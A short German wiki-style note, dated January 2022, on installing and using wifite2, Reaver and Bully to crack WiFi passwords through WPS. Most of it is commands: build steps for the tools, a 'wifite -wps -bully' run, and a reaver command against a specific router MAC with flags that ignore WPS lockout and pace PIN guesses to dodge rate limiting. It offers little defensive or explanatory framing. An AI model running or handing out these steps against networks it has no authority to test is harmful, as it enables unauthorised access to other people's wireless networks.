===== wifite2 Version 2.2.5 =====

So toll ein Handshake auch ist, die Länge des Passworts und dessen Komplexität sind oft zu hoch, als dass man das schnell rausbekommt.

WEP gibt es zum Glück nicht mehr, aber viele nutzen noch WPS.

wifite2 automatisiert das ganze.

<code>
wget https://github.com/derv82/wifite2/archive/refs/heads/master.zip
unzip master.zip; rm master.zip
cd wifite2-master
sudo ./Wifite.py
</code>

Da fehlt dann aber noch so manches tool. Fangen wir mal mit [[https://github.com/t6x/reaver-wps-fork-t6x|Reaver]] und [[https://github.com/aanarchyy/bully|Bully]] an, um WPS zu knacken.

==== Reaver ====
<code>
sudo apt -y install build-essential libpcap-dev aircrack-ng pixiewps
wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip 
unzip master.zip
cd reaver-wps-fork-t6x*
cd src
./configure
make
sudo make install
</code>

==== Bully ====
<code>
sudo apt-get -y install build-essential libpcap-dev aircrack-ng pixiewps
wget https://github.com/aanarchyy/bully/archive/master.zip
unzip master.zip
cd bully*/
cd src/
make
sudo make install
</code>

Eigentlich will ich ja nur WEP und WPS mit bully oder reaver. Das am besten nur bei starkem WiFi und am besten noch alle Netze mitloggen.

  wifite -wps -bully

Bei Routern, die gerne Locken, kann man es mit einer etwas weniger aggressiven Einstellung versuchen.

  reaver -i mon0 -c 6 -b 00:23:69:48:33:95  -vv -L -N -d 15 -T .5 -r 3:15

-L: Ignore locked WPS state.

-N: Don’t send NACK packets when errors are detected.

-d 15: Delay 15 seconds between PIN attempts.

-T: Set timeout period to half a second.

-r 3:15: After 3 attempts, sleep for 15 seconds

Stand Januar 2022